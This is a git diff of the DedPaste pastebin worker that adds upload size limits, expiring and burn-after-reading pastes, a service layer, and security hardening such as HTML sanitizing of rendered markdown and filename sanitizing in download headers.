-      // Handle multipart upload status (for resume)
-      const statusMatch = path.match(/^(\/e)?\/upload\/([a-zA-Z0-9_-]+)\/status$/);
-      if (statusMatch) {
-        const sessionId = statusMatch[2];
-        return await handleMultipartStatus(env, sessionId);
-      }
-
-      // Handle API decryption for web interface
-      const decryptMatch = path.match(/^\/api\/decrypt\/([a-zA-Z0-9]{8})$/);
-      if (decryptMatch) {
-        const id = decryptMatch[1];
-        return await handleWebDecrypt(id, env, ctx, request);
-      }
-
-      // Handle regular pastes with optional filename
-      const regularMatch = path.match(/^\/([a-zA-Z0-9]{8})(?:\/(.+))?$/);
-      if (regularMatch) {
-        const id = regularMatch[1];
-        const urlFilename = regularMatch[2] || null;
-        return await handleGet(id, env, ctx, false, request, urlFilename);
-      }
-
-      // Handle encrypted pastes with optional filename
-      const encryptedMatch = path.match(/^\/e\/([a-zA-Z0-9]{8})(?:\/(.+))?$/);
-      if (encryptedMatch) {
-        const id = encryptedMatch[1];
-        const urlFilename = encryptedMatch[2] || null;
-        return await handleGet(id, env, ctx, true, request, urlFilename);
-      }
-
-      // Try to serve styles.css directly if [site] configuration doesn't work
-      if (path === "/styles.css") {
-        // Serve MUI CSS instead of Tailwind
-        const cssContent = getMuiCSS();
-
-        console.log("Serving MUI CSS file");
-        return new Response(cssContent, {
-          headers: {
-            "Content-Type": "text/css",
-            "Cache-Control": "public, max-age=86400",
-          },
-        });
-      }
-
-      // Serve the HTML homepage
-      if (path === "/") {
-        // Track homepage view
-        await analytics.trackHomepageView(request);
-
-        return new Response(generateHomepage(url.origin), {
-          headers: {
-            "Content-Type": "text/html",
-            "Access-Control-Allow-Origin": "*",
-          },
-        });
-      }
-
-      return new Response("Not found", { status: 404 });
-    }
-
-    return new Response("Method not allowed", { status: 405 });
-  },
-};
+  return new Response("Method not allowed", { status: 405 });
+}
 
 function generateHomepage(origin: string): string {
   // Use the MUI styled homepage HTML
@@ -310,7 +423,7 @@ function generateHomepage(origin: string): string {
           <span class="text-primary-400">Ded</span>Paste
         </h1>
         <div class="flex items-center space-x-4">
-          <a href="https://github.com/anoncam/dedpaste" target="_blank" class="btn-secondary">
+          <a href="https://github.com/anoncam/dedpaste" target="_blank" rel="noopener noreferrer" class="btn-secondary">
             <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" class="w-5 h-5 mr-2">
               <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
             </svg>
@@ -594,9 +707,22 @@ async function handleUpload(
   const filename = request.headers.get("X-Filename") || "";
   const content = await request.arrayBuffer();
 
+  // Read expiration and burn-after-reading headers
+  const expireDuration = request.headers.get("X-Expire") || undefined;
+  const burnReadsHeader = request.headers.get("X-Burn-Reads");
+  const burnAfterReads = burnReadsHeader ? parseInt(burnReadsHeader, 10) : undefined;
+
   // Check if the content is empty
   if (content.byteLength === 0) {
     return new Response("Content cannot be empty", { status: 400 });
+  }
+
+  // Enforce upload size limit for standard uploads
+  if (content.byteLength > MAX_STANDARD_UPLOAD_SIZE) {
+    return new Response(
+      `Content too large. Maximum size is ${MAX_STANDARD_UPLOAD_SIZE / 1024 / 1024}MB for standard uploads. Use multipart upload for larger files.`,
+      { status: 413 },
+    );
   }
 
   // Generate a unique ID for the paste
@@ -605,6 +731,15 @@ async function handleUpload(
   // Ensure encrypted content is always stored with the correct content type
   // This fixes issues with one-time encrypted pastes
   const adjustedContentType = isEncrypted ? "application/json" : contentType;
+
+  // Compute expiration timestamp if duration specified
+  let expiresAt: number | undefined;
+  if (expireDuration) {
+    const durationMs = parseDuration(expireDuration);
+    if (durationMs) {
+      expiresAt = Date.now() + durationMs;
+    }
+  }
 
   // For one-time pastes, use a completely different storage strategy with a prefix
   if (isOneTime) {
@@ -617,6 +752,9 @@ async function handleUpload(
       isOneTime: true, // Always true for this storage path
       createdAt: Date.now(),
       filename: filename || undefined,
+      expiresAt,
+      remainingReads: burnAfterReads,
+      maxReads: burnAfterReads,
     };
 
     // Store the content in R2 with the prefixed key
@@ -625,7 +763,7 @@ async function handleUpload(
     });
 
     console.log(
-      `Created one-time paste with storage key ${storageKey}, isEncrypted=${isEncrypted}`,
+      `Created one-time paste with storage key ${storageKey}, isEncrypted=${isEncrypted}, expires=${expiresAt || "never"}`,
     );
   } else {
     // Regular paste - standard storage path
@@ -635,6 +773,9 @@ async function handleUpload(
       isOneTime: false, // Always false for this storage path
       createdAt: Date.now(),
       filename: filename || undefined,
+      expiresAt,
+      remainingReads: burnAfterReads,
+      maxReads: burnAfterReads,
     };
 
     // Store the content in R2 with metadata
@@ -642,7 +783,7 @@ async function handleUpload(
       customMetadata: metadata as any,
     });
 
-    console.log(`Created regular paste ${id}, isEncrypted=${isEncrypted}`);
+    console.log(`Created regular paste ${id}, isEncrypted=${isEncrypted}, expires=${expiresAt || "never"}`);
   }
 
   const baseUrl = new URL(request.url).origin;
@@ -671,13 +812,20 @@ async function handleUpload(
     });
   }
 
+  // Build response headers
+  const responseHeaders: Record<string, string> = {
+    "Access-Control-Allow-Origin": "*",
+    "Content-Type": "text/plain",
+  };
+  if (expiresAt) {
+    responseHeaders["X-Expires-At"] = new Date(expiresAt).toISOString();
+  }
+  if (burnAfterReads) {
+    responseHeaders["X-Burn-Reads"] = burnAfterReads.toString();
+  }
+
   // Return the paste URL - we always use the unprefixed ID in the URL
-  return new Response(pasteUrl, {
-    headers: {
-      "Access-Control-Allow-Origin": "*",
-      "Content-Type": "text/plain",
-    },
-  });
+  return new Response(pasteUrl, { headers: responseHeaders });
 }
 
 async function handleGet(
@@ -952,7 +1100,7 @@ async function handleGet(
     return new Response(content, {
       headers: {
         "Content-Type": contentType,
-        "Content-Disposition": `${disposition}; filename="${effectiveFilename}"`,
+        "Content-Disposition": `${disposition}; filename="${sanitizeFilename(effectiveFilename)}"`,
         "Access-Control-Allow-Origin": "*",
         "Cache-Control":
           "no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0",
@@ -1041,7 +1189,7 @@ async function handleGet(
   return new Response(paste.body, {
     headers: {
       "Content-Type": contentType,
-      "Content-Disposition": `${disposition}; filename="${effectiveFilename}"`,
+      "Content-Disposition": `${disposition}; filename="${sanitizeFilename(effectiveFilename)}"`,
       "Content-Length": paste.size.toString(),
       "Access-Control-Allow-Origin": "*",
       "Cache-Control": "no-store, no-cache, must-revalidate, proxy-revalidate",
@@ -1223,8 +1371,9 @@ async function renderMarkdownAsHTML(
     renderer: renderer,
   });
 
-  // Parse the markdown to HTML
-  const htmlContent = await marked.parse(markdownContent);
+  // Parse the markdown to HTML and sanitize to prevent XSS
+  const rawHtmlContent = await marked.parse(markdownContent);
+  const htmlContent = sanitizeHtml(rawHtmlContent);
 
   // Generate a title from the filename or first heading
   let title = filename || "Markdown Document";
@@ -1796,7 +1945,7 @@ async function renderMarkdownAsHTML(
   </main>
   
   <footer class="footer">
-    <p>Rendered with <a href="https://github.com/anoncam/dedpaste" target="_blank">DedPaste</a></p>
+    <p>Rendered with <a href="https://github.com/anoncam/dedpaste" target="_blank" rel="noopener noreferrer">DedPaste</a></p>
     <p style="margin-top: 0.5rem;">
       <a href="/${pasteId}?raw=true">View Raw</a> • 
       <a href="https://paste.d3d.dev">Create New Paste</a>
@@ -1805,7 +1954,7 @@ async function renderMarkdownAsHTML(
   
   <script>
     // Store the original markdown content
-    const originalMarkdown = ${JSON.stringify(markdownContent)};
+    const originalMarkdown = ${safeJsonEmbed(markdownContent)};
     
     // Copy all markdown source to clipboard
     function copyAllMarkdown() {
@@ -2090,6 +2239,86 @@ function escapeHtml(unsafe: string): string {
 }
 
 /**
+ * Sanitizes HTML output from markdown rendering to prevent XSS.
+ * Strips dangerous tags (script, iframe, object, embed, form, etc.)
+ * and dangerous attributes (on*, javascript: URLs, data: URLs).
+ */
+function sanitizeHtml(html: string): string {
+  // Remove dangerous tags entirely (including content for script/style)
+  html = html.replace(
+    /<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>/gi,
+    "",
+  );
+  html = html.replace(/<style\b[^<]*(?:(?!<\/style>)<[^<]*)*<\/style>/gi, "");
+
+  // Remove dangerous self-closing/void tags
+  const dangerousTags = [
+    "iframe",
+    "object",
+    "embed",
+    "applet",
+    "form",
+    "input",
+    "textarea",
+    "select",
+    "button",
+    "link",
+    "meta",
+    "base",
+  ];
+  for (const tag of dangerousTags) {
+    const openClose = new RegExp(
+      `<${tag}\\b[^<]*(?:(?!<\\/${tag}>)<[^<]*)*<\\/${tag}>`,
+      "gi",
+    );
+    html = html.replace(openClose, "");
+    const selfClose = new RegExp(`<${tag}\\b[^>]*\\/?>`, "gi");
+    html = html.replace(selfClose, "");
+  }
+
+  // Remove event handler attributes (on*)
+  html = html.replace(/\s+on\w+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi, "");
+
+  // Remove javascript: and vbscript: URLs in href/src/action attributes
+  html = html.replace(
+    /(href|src|action)\s*=\s*(?:"[^"]*javascript:[^"]*"|'[^']*javascript:[^']*')/gi,
+    '$1=""',
+  );
+  html = html.replace(
+    /(href|src|action)\s*=\s*(?:"[^"]*vbscript:[^"]*"|'[^']*vbscript:[^']*')/gi,
+    '$1=""',
+  );
+  html = html.replace(
+    /(href|src|action)\s*=\s*(?:"[^"]*data:[^"]*"|'[^']*data:[^']*')/gi,
+    '$1=""',
+  );
+
+  return html;
+}
+
+/**
+ * Safely embeds a string into a <script> block as JSON.
+ * Escapes </script> and <!-- sequences that could break out of the script context.
+ */
+function safeJsonEmbed(value: string): string {
+  return JSON.stringify(value)
+    .replace(/</g, "\\u003c")
+    .replace(/>/g, "\\u003e");
+}
+
+/**
+ * Sanitizes a filename for safe use in Content-Disposition headers.
+ * Removes characters that could cause header injection.
+ */
+function sanitizeFilename(filename: string): string {
+  // Remove path traversal, quotes, control characters, and newlines
+  return filename
+    .replace(/["\\\r\n]/g, "_")
+    .replace(/\.\.\//g, "")
+    .replace(/[^\x20-\x7E]/g, "_");
+}
+
+/**
  * Get the web interface HTML
  */
 
@@ -2113,6 +2342,23 @@ async function handleWebUpload(request: Request, env: Env): Promise<Response> {
     }
 
     const content = await file.arrayBuffer();
+
+    // Enforce upload size limit
+    if (content.byteLength > MAX_STANDARD_UPLOAD_SIZE) {
+      return new Response(
+        JSON.stringify({
+          error: `File too large. Maximum size is ${MAX_STANDARD_UPLOAD_SIZE / 1024 / 1024}MB.`,
+        }),
+        {
+          status: 413,
+          headers: {
+            "Content-Type": "application/json",
+            "Access-Control-Allow-Origin": getCorsOrigin(request),
+          },
+        },
+      );
+    }
+
     const id = generateId();
     const key = oneTime ? `${ONE_TIME_PREFIX}${id}` : id;
 
@@ -2163,9 +2409,26 @@ async function handleTextUpload(request: Request, env: Env): Promise<Response> {
         status: 400,
         headers: {
           "Content-Type": "application/json",
-          "Access-Control-Allow-Origin": "*",
+          "Access-Control-Allow-Origin": getCorsOrigin(request),
         },
       });
+    }
+
+    // Enforce upload size limit
+    const contentBytes = new TextEncoder().encode(content);
+    if (contentBytes.byteLength > MAX_STANDARD_UPLOAD_SIZE) {
+      return new Response(
+        JSON.stringify({
+          error: `Content too large. Maximum size is ${MAX_STANDARD_UPLOAD_SIZE / 1024 / 1024}MB.`,
+        }),
+        {
+          status: 413,
+          headers: {
+            "Content-Type": "application/json",
+            "Access-Control-Allow-Origin": getCorsOrigin(request),
+          },
+        },
+      );
     }
 
     const id = generateId();
@@ -2270,10 +2533,7 @@ async function saveUploadSession(
 /**
  * Delete upload session from KV storage.
  */
-async function deleteUploadSession(
-  env: Env,
-  sessionId: string,
-): Promise<void> {
+async function deleteUploadSession(env: Env, sessionId: string): Promise<void> {
   if (env.UPLOAD_SESSIONS) {
     await env.UPLOAD_SESSIONS.delete(sessionId);
   }
@@ -2292,7 +2552,8 @@ async function handleMultipartInit(
   if (!env.UPLOAD_SESSIONS) {
     return new Response(
       JSON.stringify({
-        error: "Large file uploads not configured. UPLOAD_SESSIONS KV namespace required.",
+        error:
+          "Large file uploads not configured. UPLOAD_SESSIONS KV namespace required.",
       }),
       {
         status: 503,
@@ -2318,7 +2579,10 @@ async function handleMultipartInit(
     // Validate request
     if (!filename || !contentType || !totalSize || !totalParts) {
       return new Response(
-        JSON.stringify({ error: "Missing required fields: filename, contentType, totalSize, totalParts" }),
+        JSON.stringify({
+          error:
+            "Missing required fields: filename, contentType, totalSize, totalParts",
+        }),
         {
           status: 400,
           headers: {
@@ -2560,17 +2824,17 @@ async function handleMultipartPartUpload(
       },
     });
   } catch (error) {
-    console.error(`[MULTIPART] Part upload error for session ${sessionId}:`, error);
-    return new Response(
-      JSON.stringify({ error: "Failed to upload part" }),
-      {
-        status: 500,
-        headers: {
-          "Content-Type": "application/json",
-          "Access-Control-Allow-Origin": "*",
-        },
-      },
+    console.error(
+      `[MULTIPART] Part upload error for session ${sessionId}:`,
+      error,
     );
+    return new Response(JSON.stringify({ error: "Failed to upload part" }), {
+      status: 500,
+      headers: {
+        "Content-Type": "application/json",
+        "Access-Control-Allow-Origin": "*",
+      },
+    });
   }
 }
 
@@ -2674,7 +2938,10 @@ async function handleMultipartComplete(
       },
     });
   } catch (error) {
-    console.error(`[MULTIPART] Complete error for session ${sessionId}:`, error);
+    console.error(
+      `[MULTIPART] Complete error for session ${sessionId}:`,
+      error,
+    );
     return new Response(
       JSON.stringify({ error: "Failed to complete multipart upload" }),
       {
@@ -2703,7 +2970,10 @@ async function handleMultipartAbort(
     if (!session) {
       // Session not found - may already be aborted or expired
       return new Response(
-        JSON.stringify({ success: true, message: "Session not found or already cleaned up" }),
+        JSON.stringify({
+          success: true,
+          message: "Session not found or already cleaned up",
+        }),
         {
           status: 200,
           headers: {
@@ -2723,7 +2993,10 @@ async function handleMultipartAbort(
       await multipartUpload.abort();
     } catch (e) {
       // Ignore abort errors - upload may already be completed or aborted
-      console.log(`[MULTIPART] Abort R2 upload warning for session ${sessionId}:`, e);
+      console.log(
+        `[MULTIPART] Abort R2 upload warning for session ${sessionId}:`,
+        e,
+      );
     }
 
     // Delete session from KV
@@ -2732,7 +3005,10 @@ async function handleMultipartAbort(
     console.log(`[MULTIPART] Aborted upload session ${sessionId}`);
 
     return new Response(
-      JSON.stringify({ success: true, message: "Upload session aborted and cleaned up" }),
+      JSON.stringify({
+        success: true,
+        message: "Upload session aborted and cleaned up",
+      }),
       {
         status: 200,
         headers: {
@@ -2808,7 +3084,10 @@ async function handleMultipartStatus(
       : session.key;
 
     // Calculate uploaded bytes
-    const uploadedBytes = session.uploadedParts.reduce((sum, p) => sum + p.size, 0);
+    const uploadedBytes = session.uploadedParts.reduce(
+      (sum, p) => sum + p.size,
+      0,
+    );
 
     const response: UploadStatusResponse = {
       sessionId,

--- a/src/muiStyles.ts
+++ b/src/muiStyles.ts
@@ -265,7 +265,6 @@ export const getMuiCSS = () => `
     position: relative;
     box-sizing: border-box;
     background-color: transparent;
-    outline: 0;
     border: 0;
     margin: 0;
     cursor: pointer;
@@ -286,6 +285,11 @@ export const getMuiCSS = () => `
                 box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
                 border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
                 color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
+  }
+
+  .MuiButton:focus-visible {
+    outline: 2px solid var(--mui-palette-primary-main);
+    outline-offset: 2px;
   }
 
   .MuiButton-contained {
@@ -845,7 +849,7 @@ export const getHomepageHTML = () => `<!DOCTYPE html>
           <span style="color: var(--mui-palette-primary-main);">Ded</span>Paste
         </h1>
         <div class="MuiStack MuiStack-row MuiStack-spacing-2">
-          <a href="https://github.com/anoncam/dedpaste" target="_blank" class="MuiButton MuiButton-outlined MuiButton-outlinedPrimary">
+          <a href="https://github.com/anoncam/dedpaste" target="_blank" rel="noopener noreferrer" class="MuiButton MuiButton-outlined MuiButton-outlinedPrimary">
             <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" class="icon-small" style="margin-right: 8px;">
               <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
             </svg>
@@ -879,7 +883,7 @@ export const getHomepageHTML = () => `<!DOCTYPE html>
           <a href="#install" class="MuiButton MuiButton-contained MuiButton-containedPrimary" style="padding: 12px 32px; font-size: 1.1rem;">
             Get Started
           </a>
-          <a href="https://github.com/anoncam/dedpaste#readme" target="_blank" class="MuiButton MuiButton-outlined MuiButton-outlinedPrimary" style="padding: 12px 32px; font-size: 1.1rem;">
+          <a href="https://github.com/anoncam/dedpaste#readme" target="_blank" rel="noopener noreferrer" class="MuiButton MuiButton-outlined MuiButton-outlinedPrimary" style="padding: 12px 32px; font-size: 1.1rem;">
             Documentation
           </a>
         </div>
@@ -1429,21 +1433,21 @@ curl -X POST https://paste.d3d.dev/api/paste \\
   <footer class="text-center py-6" style="border-top: 1px solid var(--mui-palette-divider); margin-top: var(--mui-spacing-8); background: var(--mui-palette-background-paper);">
       <div class="MuiContainer">
         <div class="MuiStack MuiStack-row MuiStack-spacing-3" style="justify-content: center; margin-bottom: var(--mui-spacing-3);">
-          <a href="https://github.com/anoncam/dedpaste" target="_blank" style="display: flex; align-items: center;">
+          <a href="https://github.com/anoncam/dedpaste" target="_blank" rel="noopener noreferrer" style="display: flex; align-items: center;">
             <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="currentColor" class="icon-small" style="margin-right: 4px;">
               <path d="M12 0c-6.626 0-12 5.373-12 12 0 5.302 3.438 9.8 8.207 11.387.599.111.793-.261.793-.577v-2.234c-3.338.726-4.033-1.416-4.033-1.416-.546-1.387-1.333-1.756-1.333-1.756-1.089-.745.083-.729.083-.729 1.205.084 1.839 1.237 1.839 1.237 1.07 1.834 2.807 1.304 3.492.997.107-.775.418-1.305.762-1.604-2.665-.305-5.467-1.334-5.467-5.931 0-1.311.469-2.381 1.236-3.221-.124-.303-.535-1.524.117-3.176 0 0 1.008-.322 3.301 1.23.957-.266 1.983-.399 3.003-.404 1.02.005 2.047.138 3.006.404 2.291-1.552 3.297-1.23 3.297-1.23.653 1.653.242 2.874.118 3.176.77.84 1.235 1.911 1.235 3.221 0 4.609-2.807 5.624-5.479 5.921.43.372.823 1.102.823 2.222v3.293c0 .319.192.694.801.576 4.765-1.589 8.199-6.086 8.199-11.386 0-6.627-5.373-12-12-12z"/>
             </svg>
             GitHub
           </a>
           <span style="color: var(--mui-palette-text-disabled);">•</span>
-          <a href="https://www.npmjs.com/package/dedpaste" target="_blank">NPM</a>
+          <a href="https://www.npmjs.com/package/dedpaste" target="_blank" rel="noopener noreferrer">NPM</a>
           <span style="color: var(--mui-palette-text-disabled);">•</span>
-          <a href="https://github.com/anoncam/dedpaste/issues" target="_blank">Report Issue</a>
+          <a href="https://github.com/anoncam/dedpaste/issues" target="_blank" rel="noopener noreferrer">Report Issue</a>
           <span style="color: var(--mui-palette-text-disabled);">•</span>
-          <a href="https://github.com/anoncam/dedpaste/blob/main/LICENSE" target="_blank">MIT License</a>
+          <a href="https://github.com/anoncam/dedpaste/blob/main/LICENSE" target="_blank" rel="noopener noreferrer">MIT License</a>
         </div>
         <p class="MuiTypography-body2" style="color: var(--mui-palette-text-secondary); margin-bottom: var(--mui-spacing-1);">
-          Version 1.13.2 • © 2024 DedPaste
+          Version 1.23.2 • © 2025 DedPaste
         </p>
         <p class="MuiTypography-caption" style="color: var(--mui-palette-text-disabled);">
           Built with 🔐 for privacy enthusiasts • Powered by Cloudflare Workers & Material-UI

--- a/src/services/encryptionService.ts
+++ b/src/services/encryptionService.ts
@@ -1,0 +1,138 @@
+/**
+ * Encryption Service - Server-side encryption utilities.
+ *
+ * Note: DedPaste uses client-side end-to-end encryption. The server
+ * never sees unencrypted content. This service provides utilities for:
+ * - Detecting encrypted content
+ * - Validating encryption metadata
+ * - Generating IDs and tokens using the Web Crypto API
+ */
+
+/** Encryption metadata structure (matches what the CLI produces) */
+export interface EncryptedPayload {
+  /** Encryption format version */
+  version: number;
+  /** Encrypted symmetric key (base64) */
+  encryptedKey: string;
+  /** Initialization vector (base64) */
+  iv: string;
+  /** Authentication tag (base64) */
+  authTag: string;
+  /** Encrypted content (base64) */
+  encryptedContent: string;
+}
+
+/**
+ * Interface for the encryption service.
+ */
+export interface IEncryptionService {
+  /**
+   * Check if content appears to be encrypted in the DedPaste format.
+   * @param content - The content to check (as string)
+   * @returns Whether the content looks like a DedPaste encrypted payload
+   */
+  isEncryptedPayload(content: string): boolean;
+
+  /**
+   * Validate the structure of an encrypted payload.
+   * @param content - The content to validate
+   * @returns An error message if invalid, or null if valid
+   */
+  validateEncryptedPayload(content: string): string | null;
+
+  /**
+   * Generate a cryptographically random token using Web Crypto API.
+   * @param length - The length in bytes (default 32)
+   * @returns A hex-encoded random string
+   */
+  generateToken(length?: number): string;
+
+  /**
+   * Generate a SHA-256 hash of the given data using Web Crypto API.
+   * @param data - The data to hash
+   * @returns The hex-encoded hash
+   */
+  hash(data: string): Promise<string>;
+}
+
+/**
+ * Concrete implementation of the encryption service.
+ */
+export class EncryptionService implements IEncryptionService {
+  isEncryptedPayload(content: string): boolean {
+    try {
+      const parsed = JSON.parse(content);
+      return (
+        typeof parsed === "object" &&
+        parsed !== null &&
+        "version" in parsed &&
+        "encryptedKey" in parsed &&
+        "iv" in parsed &&
+        "encryptedContent" in parsed
+      );
+    } catch {
+      return false;
+    }
+  }
+
+  validateEncryptedPayload(content: string): string | null {
+    try {
+      const parsed = JSON.parse(content);
+
+      if (typeof parsed !== "object" || parsed === null) {
+        return "Encrypted payload must be a JSON object";
+      }
+
+      if (typeof parsed.version !== "number") {
+        return "Missing or invalid 'version' field";
+      }
+
+      if (parsed.version < 1 || parsed.version > 4) {
+        return `Unsupported encryption version: ${parsed.version}`;
+      }
+
+      if (typeof parsed.encryptedKey !== "string" || !parsed.encryptedKey) {
+        return "Missing or invalid 'encryptedKey' field";
+      }
+
+      // Version 4 (streaming) has different structure
+      if (parsed.version === 4) {
+        if (!parsed.metadata || typeof parsed.metadata !== "object") {
+          return "Version 4 payload missing 'metadata' field";
+        }
+        return null;
+      }
+
+      if (typeof parsed.iv !== "string" || !parsed.iv) {
+        return "Missing or invalid 'iv' field";
+      }
+
+      if (
+        typeof parsed.encryptedContent !== "string" ||
+        !parsed.encryptedContent
+      ) {
+        return "Missing or invalid 'encryptedContent' field";
+      }
+
+      return null;
+    } catch {
+      return "Content is not valid JSON";
+    }
+  }
+
+  generateToken(length = 32): string {
+    const bytes = new Uint8Array(length);
+    crypto.getRandomValues(bytes);
+    return Array.from(bytes)
+      .map((b) => b.toString(16).padStart(2, "0"))
+      .join("");
+  }
+
+  async hash(data: string): Promise<string> {
+    const encoder = new TextEncoder();
+    const buffer = encoder.encode(data);
+    const hashBuffer = await crypto.subtle.digest("SHA-256", buffer);
+    const hashArray = Array.from(new Uint8Array(hashBuffer));
+    return hashArray.map((b) => b.toString(16).padStart(2, "0")).join("");
+  }
+}

--- a/src/services/index.ts
+++ b/src/services/index.ts
@@ -1,0 +1,59 @@
+/**
+ * Service Layer - Central export and factory for all services.
+ *
+ * Provides dependency injection by constructing services with their
+ * dependencies and exposing a single ServiceContainer.
+ */
+
+import {
+  StorageService,
+  type IStorageService,
+  type StorageEnv,
+} from "./storageService";
+import { PasteService, type IPasteService } from "./pasteService";
+import {
+  EncryptionService,
+  type IEncryptionService,
+} from "./encryptionService";
+
+// Re-export all service types and interfaces
+export type { IStorageService, StorageEnv, StorageGetResult, PasteMetadata } from "./storageService";
+export type {
+  IPasteService,
+  CreatePasteOptions,
+  CreatePasteResult,
+  GetPasteResult,
+} from "./pasteService";
+export type { IEncryptionService, EncryptedPayload } from "./encryptionService";
+export { StorageService } from "./storageService";
+export { PasteService, parseDuration } from "./pasteService";
+export { EncryptionService } from "./encryptionService";
+
+/**
+ * Container for all services, constructed with environment bindings.
+ * This is the main entry point for dependency injection in the worker.
+ */
+export interface ServiceContainer {
+  storage: IStorageService & { initialize: () => Promise<void>; setupBurnAfterReading: (id: string, maxReads: number) => Promise<void> };
+  paste: IPasteService;
+  encryption: IEncryptionService;
+}
+
+/**
+ * Create a ServiceContainer with all services wired together.
+ * Call `services.storage.initialize()` before first use to load KV state.
+ *
+ * @param env - Cloudflare Workers environment bindings
+ * @returns A fully configured ServiceContainer
+ */
+export function createServices(env: StorageEnv): ServiceContainer {
+  const storage = new StorageService(env);
+  const paste = new PasteService(storage);
+  const encryption = new EncryptionService();
+
+  return {
+    storage,
+    paste,
+    encryption,
+  };
+}

--- a/src/services/pasteService.ts
+++ b/src/services/pasteService.ts
@@ -1,0 +1,352 @@
+/**
+ * Paste Service - Business logic for paste CRUD operations.
+ *
+ * Handles paste creation, retrieval, deletion, and lifecycle management.
+ * Delegates storage operations to the StorageService.
+ */
+
+import type {
+  IStorageService,
+  PasteMetadata,
+  StorageGetResult,
+} from "./storageService";
+
+/** Options for creating a new paste */
+export interface CreatePasteOptions {
+  /** Whether the paste is encrypted */
+  isEncrypted: boolean;
+  /** Whether this is a one-time (self-destructing) paste */
+  isOneTime: boolean;
+  /** Content type of the paste */
+  contentType: string;
+  /** Optional filename */
+  filename?: string;
+  /** Optional expiration duration string (e.g., "1h", "24h", "7d", "30d") */
+  expireDuration?: string;
+  /** Optional burn-after-reading count */
+  burnAfterReads?: number;
+}
+
+/** Result of creating a paste */
+export interface CreatePasteResult {
+  /** The generated paste ID */
+  id: string;
+  /** The full URL to access the paste */
+  url: string;
+  /** Expiration timestamp, if set */
+  expiresAt?: number;
+  /** Whether the paste is encrypted */
+  isEncrypted: boolean;
+  /** Whether burn-after-reading is active */
+  isBurnAfterReading: boolean;
+  /** Number of reads remaining (if burn-after-reading) */
+  remainingReads?: number;
+}
+
+/** Result of retrieving a paste */
+export interface GetPasteResult {
+  /** The paste content as a ReadableStream */
+  body: ReadableStream;
+  /** Get the full content as ArrayBuffer */
+  arrayBuffer: () => Promise<ArrayBuffer>;
+  /** Content type */
+  contentType: string;
+  /** Filename */
+  filename: string;
+  /** Size in bytes */
+  size: number;
+  /** Whether this was a one-time paste */
+  isOneTime: boolean;
+  /** Whether the paste is encrypted */
+  isEncrypted: boolean;
+  /** Expiration timestamp, if set */
+  expiresAt?: number;
+  /** Remaining reads if burn-after-reading */
+  remainingReads?: number;
+  /** Creation timestamp */
+  createdAt: number;
+}
+
+/**
+ * Interface for the paste service.
+ */
+export interface IPasteService {
+  /**
+   * Create a new paste.
+   * @param content - The content to store
+   * @param options - Creation options
+   * @param baseUrl - The base URL for generating paste URLs
+   * @returns The created paste info
+   */
+  createPaste(
+    content: ArrayBuffer | string,
+    options: CreatePasteOptions,
+    baseUrl: string,
+  ): Promise<CreatePasteResult>;
+
+  /**
+   * Retrieve a paste by ID.
+   * @param id - The paste ID
+   * @param isEncrypted - Whether to look for it in the encrypted path
+   * @returns The paste content and metadata, or null if not found
+   */
+  getPaste(id: string, isEncrypted: boolean): Promise<GetPasteResult | null>;
+
+  /**
+   * Delete a paste by ID.
+   * @param id - The paste ID
+   */
+  deletePaste(id: string): Promise<void>;
+}
+
+/** Duration parsing map */
+const DURATION_MAP: Record<string, number> = {
+  m: 60 * 1000,
+  h: 60 * 60 * 1000,
+  d: 24 * 60 * 60 * 1000,
+  w: 7 * 24 * 60 * 60 * 1000,
+};
+
+/**
+ * Parse a duration string like "1h", "24h", "7d", "30d" into milliseconds.
+ * @param duration - The duration string
+ * @returns Milliseconds, or null if invalid
+ */
+export function parseDuration(duration: string): number | null {
+  const match = duration.match(/^(\d+)([mhdw])$/);
+  if (!match) {
+    return null;
+  }
+
+  const value = parseInt(match[1], 10);
+  const unit = match[2];
+  const multiplier = DURATION_MAP[unit];
+
+  if (!multiplier || value <= 0) {
+    return null;
+  }
+
+  return value * multiplier;
+}
+
+/**
+ * Generate a random alphanumeric ID.
+ * @param length - The length of the ID (default 8)
+ */
+function generateId(length = 8): string {
+  const chars =
+    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+  let result = "";
+  for (let i = 0; i < length; i++) {
+    result += chars.charAt(Math.floor(Math.random() * chars.length));
+  }
+  return result;
+}
+
+/**
+ * Concrete implementation of the paste service.
+ */
+export class PasteService implements IPasteService {
+  private storage: IStorageService;
+
+  constructor(storage: IStorageService) {
+    this.storage = storage;
+  }
+
+  async createPaste(
+    content: ArrayBuffer | string,
+    options: CreatePasteOptions,
+    baseUrl: string,
+  ): Promise<CreatePasteResult> {
+    const id = generateId();
+
+    // Compute expiration if specified
+    let expiresAt: number | undefined;
+    if (options.expireDuration) {
+      const durationMs = parseDuration(options.expireDuration);
+      if (durationMs) {
+        expiresAt = Date.now() + durationMs;
+      }
+    }
+
+    // Ensure encrypted content uses application/json content type
+    const adjustedContentType = options.isEncrypted
+      ? "application/json"
+      : options.contentType;
+
